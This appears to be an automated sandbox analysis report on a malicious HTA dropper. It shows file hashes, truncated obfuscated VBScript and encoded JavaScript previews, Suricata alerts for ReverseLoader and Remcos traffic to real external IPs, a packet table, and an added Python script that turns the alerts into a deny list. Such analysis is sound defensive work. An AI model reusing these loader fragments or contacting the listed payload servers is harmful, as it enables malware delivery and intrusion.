                                                                                                        SHA-512:E15198A1849C850E7CFA8AC970F6147842AE85F1BFB1B2D677343F28A2003469F1EDACF83B43EED2F3183FEA8610C4A97BA08D9EB7E1AEF7838A5E8F07001048
                                                                                                        Malicious:false
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!>g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,.....y.....y.......................................... :.....P ......L.........R.....Y.....].....i.....n...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.2c
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (458), with CRLF, CR line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):879
                                                                                                        Entropy (8bit):5.347222318404106
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Kwqd3ka6KgftEvfcKax5DqBVKVrdFAMBJTH:xika67lEvkK2DcVKdBJj
                                                                                                        MD5:7C25AD9F61F62E32BE4BCBD382FD716F
                                                                                                        SHA1:069D561928D62BAD910BF4CD0B969BFF309EC2ED
                                                                                                        SHA-256:9EB4110A62C6B04C45D1999E305A9732D738BDBB51FA92FE02FA7CE54CA32F88
                                                                                                        SHA-512:BE2B1C4EEE08D3B6B6733B98C13C629BBA2DA3D6A01E9D62806E5EDAD9D931B5F11E59EDC0754B5004603FF5EB4F9502426D49456BFE221BFABAB7FAA8246982
                                                                                                        Malicious:false
                                                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                        File Type:MSVC .res
                                                                                                        Category:dropped
                                                                                                        Size (bytes):652
                                                                                                        Entropy (8bit):3.1231719906895323
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKZak7YnqqvuPN5Dlq5J:+RI+ycuZhNsZakSvuPNnqX
                                                                                                        MD5:2FBA3B1A353148DBA55CA9BEB94CA086
                                                                                                        SHA1:6DA47B128B477CB79FF92DB682C8F4A9AF36EC88
                                                                                                        SHA-256:5A30AB5E8E5272CCC7B8BC54F8682F1174A7C1617650EDB7D16057F65BA7556B
                                                                                                        SHA-512:7048E7EF1A80273653902466A61A0C15194AE9C5DE5E35890BA9E6328CEC03EC50EB031E16E656D03535FA0A8B200679323507B4A6478E3E98CE312D574F6AAA
                                                                                                        Malicious:false
                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.c.1.b.g.m.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...2.c.1.b.g.m.x.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Nov 20 17:52:41 2024, 1st section name ".debug$S"
                                                                                                        Category:modified
                                                                                                        Size (bytes):1340
                                                                                                        Entropy (8bit):4.036020662097255
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:HzK9o0fpMg+hZHdbwKOLmfWI+ycuZhNsZakSvuPNnqSed:T0BCZ9MKYm+1ulsZa3vyqS+
                                                                                                        MD5:8268EAABD44BF3C1D6A7A270A5ED2229
                                                                                                        SHA1:4D4F7E8C5E70C277866539205462043819FBABD4
                                                                                                        SHA-256:B0F0F0EBD0A89B9688DDB95CD536F8E873C54BE7CB32B1D7C581A4E197A1CD6C
                                                                                                        SHA-512:864F3325B78B8622614CBE42F828F010029612FC22CC89B902C5D59D3B3C753989B85166E70319DE7BEF7321CF6F831759437833240FEF455FEDE6295747FA0F
                                                                                                        Malicious:false
                                                                                                        Preview:L....!>g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........X....c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP.............../.;.51H.\...L............7.......C:\Users\user~1\AppData\Local\Temp\RES883E.tmp.-.<....................a..Microsoft (R) CVTRES.`.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.c.1.b.g.m.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):142466
                                                                                                        Entropy (8bit):3.674082413060924
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:41jUPF8/vqjQ2AMYdCZc1uIj9X0EBz4jfOMaTUfgt5pzGGwm:VdkvqjQ2ArCjIB0k4jfOMaTsgt5pCGwm
                                                                                                        MD5:DA5A2B2A39D7AB8B9F9ADF8AF69A5F61
                                                                                                        SHA1:7588E7A25BF351AC5A16ECA9B68686C7970E60E5
                                                                                                        SHA-256:99D85E0AB098EFE5FF79ED0F26F5543BE8D9DC316132A80BA72001CCA355E89F
                                                                                                        SHA-512:D042E1BA33995BA500DD91218AAAB47310B31AEFA91862F744719EA659EB235080DE25649E50AED2ECE84C1AFF78C25BEE6B8DBE5C680AFFA925516F61F95D8A
                                                                                                        Malicious:true
                                                                                                        Preview (UTF-16 decoded):
                                                                                                        Function restivo(ByVal ambarino, ByVal pneometria, ByVal contramartelos)
                                                                                                            Dim esfalfamento
                                                                                                            esfalfamento = InStr(ambarino, pneometria)

                                                                                                            Do While esfalfamento > 0
                                                                                                                ambarino = Left(ambarino, esfalfamento - 1) & contramartelos & Mid(ambarino, esfalfamento + Len(pneometria))
                                                                                                                esfalfamento = InStr(esfalfamento + Len(contramartelos), ambarino, pneometria)
                                                                                                            Loop

                                                                                                            restivo = ambarino
                                                                                                        End Function

                                                                                                        private function ReadStdIn()
                                                                                                            while Not stdIn...
                                                                                                        File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                        Entropy (8bit):2.4734616558553384
                                                                                                        TrID:
                                                                                                          File name:seethebestthignswhichgivingbestopportunities.hta
                                                                                                          File size:368'862 bytes
                                                                                                          MD5:35b8d63ead2eb58b7ed815be7bcbf97f
                                                                                                          SHA1:88ae189165c612cc11e3a83ce322363698e21daf
                                                                                                          SHA256:886699a7b1f864a18f767b1f3c95d860bced175c6e9bf2a5186119b698b5de23
                                                                                                          SHA512:047bfd03280a842c6527d4a0c41e2d593d3222d4617152febed39120184be179a36f99374c8bca7724b11dc78c8af202a14f63e7dfe87fefc53ffb510440fcde
                                                                                                          SSDEEP:192:436mm7epKXV0b8ECbC/lepKXV0b8LCbC/+UepKXV0b8GepKXV0b89CbC/yepKXVl:Y65Cb
                                                                                                          TLSH:AC7403C3CC5F116AB2ECDE9BF97C546E249291ABE64D1FAE990FBDC0D882304F550858
                                                                                                          File Content Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%20code%20by%20https%3A//www.html-code-generator.com%20--%3E%0Adocument.write%28unescape%28%27%253C%2573%2563%2572%2569%2570%2574%253E%250A%253C%2521%252D%252D%2520%2563%256F%2564%2565%2520%2562%2579%2
                                                                                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                          2024-11-20T17:17:59.828215+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 192.3.220.29 | 80 | 192.168.2.7 | 49765 | TCP
                                                                                                          2024-11-20T17:17:59.828215+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 192.3.220.29 | 80 | 192.168.2.7 | 49765 | TCP
                                                                                                          2024-11-20T17:18:14.218612+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.7 | 49699 | 192.3.220.29 | 80 | TCP
                                                                                                          2024-11-20T17:18:26.927761+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 142.215.209.78 | 443 | 192.168.2.7 | 49713 | TCP
                                                                                                          2024-11-20T17:18:45.308579+0100 | 2858796 | ETPRO MALWARE ReverseLoader Payload Request (GET) M1 | 1 | 192.168.2.7 | 49765 | 192.3.220.29 | 80 | TCP
                                                                                                          2024-11-20T17:18:45.714020+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 192.3.220.29 | 80 | 192.168.2.7 | 49765 | TCP
                                                                                                          2024-11-20T17:18:45.714020+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 192.3.220.29 | 80 | 192.168.2.7 | 49765 | TCP
                                                                                                          2024-11-20T17:18:48.453341+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49773 | 192.3.101.149 | 6946 | TCP
                                                                                                          2024-11-20T17:18:51.453797+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.7 | 49779 | 178.237.33.50 | 80 | TCP
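A triage script over the Suricata alert rows above, added here as an example; it is not part of the Joe Sandbox report or of any tooling behind it. The rows are copied field by field from the table. The direction rule (the RFC 1918 side of each alert is the analysis VM, 192.168.2.7 here), the choice to rank Suricata priority 1 as most urgent, and the helper names are assumptions of the example. It groups the alerts by external endpoint, records first-seen time, the SIDs in firing order and the highest priority per endpoint, and prints the infection chain in time order plus a deny list of the distinct external IPs.

```python
import ipaddress
from datetime import datetime

# Column order of the Suricata alert table above.
ALERT_COLUMNS = ("timestamp", "sid", "signature", "severity",
                 "src_ip", "src_port", "dst_ip", "dst_port", "proto")

# The nine alert rows from the table above, copied field by field.
ALERT_ROWS = [
    ("2024-11-20T17:17:59.828215+0100", 2057635, "ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound", 1, "192.3.220.29", 80, "192.168.2.7", 49765, "TCP"),
    ("2024-11-20T17:17:59.828215+0100", 2858295, "ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)", 1, "192.3.220.29", 80, "192.168.2.7", 49765, "TCP"),
    ("2024-11-20T17:18:14.218612+0100", 2858795, "ETPRO MALWARE ReverseLoader Payload Request (GET) M2", 1, "192.168.2.7", 49699, "192.3.220.29", 80, "TCP"),
    ("2024-11-20T17:18:26.927761+0100", 2049038, "ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2", 1, "142.215.209.78", 443, "192.168.2.7", 49713, "TCP"),
    ("2024-11-20T17:18:45.308579+0100", 2858796, "ETPRO MALWARE ReverseLoader Payload Request (GET) M1", 1, "192.168.2.7", 49765, "192.3.220.29", 80, "TCP"),
    ("2024-11-20T17:18:45.714020+0100", 2020424, "ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1", 1, "192.3.220.29", 80, "192.168.2.7", 49765, "TCP"),
    ("2024-11-20T17:18:45.714020+0100", 2020425, "ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2", 1, "192.3.220.29", 80, "192.168.2.7", 49765, "TCP"),
    ("2024-11-20T17:18:48.453341+0100", 2036594, "ET JA3 Hash - Remcos 3.x/4.x TLS Connection", 1, "192.168.2.7", 49773, "192.3.101.149", 6946, "TCP"),
    ("2024-11-20T17:18:51.453797+0100", 2803304, "ETPRO MALWARE Common Downloader Header Pattern HCa", 3, "192.168.2.7", 49779, "178.237.33.50", 80, "TCP"),
]


def parse_alert(row):
    """Turn one table row into a dict with a timezone-aware timestamp."""
    rec = dict(zip(ALERT_COLUMNS, row))
    rec["timestamp"] = datetime.strptime(rec["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
    return rec


def is_internal(ip):
    """Assumption: private (RFC 1918 etc.) addresses belong to the analysis VM."""
    return ipaddress.ip_address(ip).is_private


def direction(rec):
    """Who talked to whom, seen from the sandbox host (192.168.2.7 here)."""
    src_int, dst_int = is_internal(rec["src_ip"]), is_internal(rec["dst_ip"])
    if src_int and not dst_int:
        return "outbound"
    if dst_int and not src_int:
        return "inbound"
    return "internal" if src_int else "external"


def external_endpoint(rec):
    """(ip, port) of the non-sandbox side, or None for purely local traffic."""
    d = direction(rec)
    if d == "outbound":
        return rec["dst_ip"], rec["dst_port"]
    if d == "inbound":
        return rec["src_ip"], rec["src_port"]
    return None


def collect_iocs(rows):
    """Group alerts by external endpoint: first-seen time, SIDs in firing order,
    directions seen, and the best (lowest) Suricata priority, 1 being most urgent."""
    iocs = {}
    for rec in sorted(map(parse_alert, rows), key=lambda r: r["timestamp"]):
        ep = external_endpoint(rec)
        if ep is None:
            continue
        entry = iocs.setdefault(ep, {"first_seen": rec["timestamp"], "sids": [],
                                     "directions": set(), "top_severity": rec["severity"]})
        entry["sids"].append(rec["sid"])
        entry["directions"].add(direction(rec))
        entry["top_severity"] = min(entry["top_severity"], rec["severity"])
    return iocs


def infection_chain(rows):
    """Time-ordered (HH:MM:SS, direction, 'ip:port', sid) tuples for the report."""
    chain = []
    for rec in sorted(map(parse_alert, rows), key=lambda r: r["timestamp"]):
        ep = external_endpoint(rec)
        if ep:
            chain.append((rec["timestamp"].strftime("%H:%M:%S"), direction(rec),
                          "%s:%d" % ep, rec["sid"]))
    return chain


def blocklist(iocs):
    """Distinct external IPs, sorted numerically, ready for a deny list."""
    return sorted({ip for ip, _ in iocs}, key=ipaddress.ip_address)


if __name__ == "__main__":
    for step in infection_chain(ALERT_ROWS):
        print("%s %-8s %-20s sid:%d" % step)
    iocs = collect_iocs(ALERT_ROWS)
    for (ip, port), info in iocs.items():
        print("%s:%d first seen %s, prio %d, sids %s" % (
            ip, port, info["first_seen"].isoformat(), info["top_severity"], info["sids"]))
    print("blocklist:", blocklist(iocs))
```

Run as a script it lists the four external endpoints in the order the report first saw them (the payload server on 192.3.220.29:80, the image host 142.215.209.78:443, the Remcos TLS endpoint 192.3.101.149:6946 and 178.237.33.50:80), which is the set a responder would feed to perimeter blocking and to a retro-hunt over proxy and NetFlow logs.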
                                                                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                          Nov 20, 2024 17:18:12.898266077 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:13.018008947 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:13.018105030 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:13.018316031 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:13.142383099 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218533993 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218611956 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.218667030 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218704939 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218740940 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218755960 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.218775988 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218810081 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218837023 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.218844891 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218858957 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.218879938 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218911886 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.218911886 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218928099 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.218946934 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.218957901 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.218986988 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.341175079 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.341197968 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.341255903 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.341299057 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.422223091 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.422245026 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.422302008 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.422338009 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.426580906 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.426595926 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.426635027 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.435441971 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.435457945 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.435492992 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.435511112 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.442384958 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.442404032 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.442465067 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.451623917 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.451678038 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.451766014 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.451808929 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.457529068 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.457581997 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.457776070 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.457927942 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.466660023 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.466710091 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.466823101 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.466892958 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.474742889 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.474759102 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.474798918 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.483107090 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.483123064 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.483154058 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.483185053 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.493422985 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.493438005 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.493474960 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.493495941 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.499583006 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.499598026 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.499634027 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.622191906 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.622334003 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.622371912 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.622371912 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.624824047 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.624947071 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.624969959 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.625026941 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.630330086 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.630422115 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.630635977 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.630692959 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.636292934 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.636308908 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.636363983 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.640048027 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.640062094 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.640101910 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.645128012 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.645199060 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.645204067 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.645277023 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.650264978 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.650341034 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.651376009 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.656861067 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.656877041 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.656944990 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.656997919 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.661416054 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.661561012 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.661575079 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.661659956 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.666667938 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.666681051 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.666747093 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.671622992 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.671884060 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
                                                                                                          Nov 20, 2024 17:18:14.671905041 CET | 80 | 49699 | 192.3.220.29 | 192.168.2.7
                                                                                                          Nov 20, 2024 17:18:14.671983004 CET | 49699 | 80 | 192.168.2.7 | 192.3.220.29
